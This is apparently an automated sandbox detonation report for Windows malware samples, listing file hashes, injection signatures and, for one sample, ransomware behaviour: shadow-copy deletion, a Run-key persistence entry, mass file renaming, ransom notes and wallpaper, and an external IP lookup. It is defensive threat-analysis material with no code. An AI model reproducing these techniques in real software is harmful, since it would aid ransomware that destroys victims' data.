| SHA256 | 85c5df91b63524b736dd48c89c54541adb54af48b42a7e9e2b2c9efef093accb |
| SHA512 | 8577f35ff6de8d2c01e30c30ef872b1959d4f338fa874d840343847fa3bf13590e6f9eebd6b6187dc3cd93718710a1f60a357349ce4331f1ec0b9fc0f5bf4f74 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2963259c6d428200b16d6a8124fa20f4 |
| SHA1 | 4dcfeeb99fb1cfde63de96d3ad188a1c559584bd |
| SHA256 | 6bd21dfbc346b9c1dc077f60d4ebfe2537e8d32b3e6e60c04774a554a91fb031 |
| SHA512 | 5c7563dc69b0dbfbe29e5dc329782722d42eb238eb5b1f533bb7922348fba185d3bbab4c56cbfef3c5cb67a66449135f252b5c67cb05f717693f1c55f7194010 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 51b6430a8b900cdae842b693c56c0fbe |
| SHA1 | 9b273feddf1d2bb420c255344afd5c37c438ed53 |
| SHA256 | a79efc7c93530abdb98d881b020853c984060c1cc57045fa152300f638de3c48 |
| SHA512 | c5655b38786554e760e7a4ea6f830c25a42ee0a7017553d6221c58d65ea76732b798934d2e4e334625da1ae9f645b3f68c9190e9360592a5aeae46fe35c81c37 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7c2e6530c9a4e7b0f6ddeb72d974c173 |
| SHA1 | 2f5f6067898f794dcda0baee28105ac36b4ad57c |
| SHA256 | 90eab36fc4d227ee4d09917e666b78fdf58c5bcbebe1f6e8f2d991ac977e49d8 |
| SHA512 | 68634fa3ccd51d7c914c083747999298f873a5c816ba97b5202462966251c692181fc003863288227811315e1f08afb1f0a8d7d4f57c5f18127e8e20d3509541 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 93f0806af719f1045f63962a8b27ea71 |
| SHA1 | 18249a84ff36685bf5a76ffb9582cf7239c93597 |
| SHA256 | e01cd4ad324a2c869209bb8868e03072a981c870f4c3a84df0877585c893925b |
| SHA512 | 1e7e0956b88fabb090f2059e91b4f3b2ee3f7fa04c00050c99fce32524c645675a520696bd0a352c266bb1a5731df35d179e12dc58e0ece6bae3e23f6d5f505b |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win11-20241007-en
Max time kernel
91s
Max time network
94s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 5008 wrote to memory of 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 5008 wrote to memory of 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
"C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe"
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
Network
Files
memory/5008-0-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win7-20240903-en
Max time kernel
111s
Max time network
96s
Command Line
Signatures
Deletes shadow copies
Renames multiple (359) files with added filename extension
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msconfig = "C:\\Users\\Admin\\AppData\\Roaming\\vtpvaio.exe" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_RESTORE_FILES.bmp" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1732 set thread context of 2540 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
| PID 2332 set thread context of 2492 | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | C:\Users\Admin\AppData\Roaming\vtpvaio.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\DVD Maker\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\main_background.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\management\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Internet Explorer\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\css\cpu.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\settings.js | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\MSInfo\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ro.pak | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\VSTO\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Asia\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\mux\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hu\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\wa\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\calendar.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\localizedSettings.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\am_ET\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\slideShow.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\settings.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\js\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c03c22115836db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
